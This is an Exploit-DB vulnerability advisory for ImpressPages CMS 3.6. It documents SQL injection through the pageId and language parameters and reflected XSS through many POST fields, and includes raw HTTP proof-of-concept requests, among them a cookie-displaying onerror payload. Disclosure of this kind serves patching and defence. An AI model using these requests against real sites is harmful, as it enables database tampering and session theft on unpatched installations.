ImpressPages CMS 3.6 - Multiple Cross-Site Scripting / SQL Injection Vulnerabilities

EDB-ID:

29318

CVE:





Platform:

PHP

Date:

2013-10-31


ImpressPages CMS v3.6 Multiple XSS/SQLi Vulnerabilities


Vendor: ImpressPages UAB
Product web page: http://www.impresspages.org
Affected version: 3.6

Summary: ImpressPages CMS is an open source web content
management system with revolutionary drag & drop interface.

Desc: Input passed via several parameters is not properly
sanitized before being returned to the user or used in SQL
queries. This can be exploited to manipulate SQL queries by
injecting arbitrary SQL code and HTML/script code in a user's
browser session in context of an affected site.

Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2
           PHP 5.4.7
           MySQL 5.5.25a


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2013-5157
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5157.php

Vendor: http://www.impresspages.org/blog/impresspages-cms-3-7-is-mobile-as-never-before/



12.10.2013

--

==================================

SQL Injection: (pageId param)

POST /impresspages/?cms_action=manage HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 124
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://localhost
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost/impresspages/?cms_action=manage
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1

g=standard&m=content_management&a=getPageOptionsHtml&securityToken=c029f7293955df089676b78af8222d2a&pageId=64'&zoneName=menu1


==================================

SQL Injection: (language param)

POST /impresspages/admin.php?module_id=436&action=export&security_token=381cb48be4ed7445a9e6303e64ae87ac HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 404
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybBHOjmAcICeilnDe
Referer: http://localhost/impresspages/admin.php?module_id=436&security_token=381cb48be4ed7445a9e6303e64ae87ac
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1

------WebKitFormBoundarybBHOjmAcICeilnDe
Content-Disposition: form-data; name="language"

344'
------WebKitFormBoundarybBHOjmAcICeilnDe
Content-Disposition: form-data; name="spec_security_code"

9f1ff00ea8fd9fd8f2d421ba5ec45a18
------WebKitFormBoundarybBHOjmAcICeilnDe
Content-Disposition: form-data; name="spec_rand_name"

lib_php_form_standard_2_
------WebKitFormBoundarybBHOjmAcICeilnDe--


==================================

Reflected XSS POST parameters:

- files[0][file]
- instanceId
- pageOptions[buttonTitle]
- pageOptions[createdOn]
- pageOptions[description]
- pageOptions[keywords]
- pageOptions[lastModified]
- pageOptions[layout]
- pageOptions[pageTitle]
- pageOptions[redirectURL]
- pageOptions[rss]
- pageOptions[type]
- pageOptions[url]
- pageOptions[visible]
- revisionId
- widgetName
- pageSize[0]
- page[0]
- road[]


==================================

POST /impresspages/?cms_action=manage HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 155
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://localhost
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost/impresspages/?cms_action=manage
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1

g=standard&m=content_management&a=deleteWidget&securityToken=c029f7293955df089676b78af8222d2a&instanceId=<img%20src%3da%20onerror%3dalert(document.cookie)>

...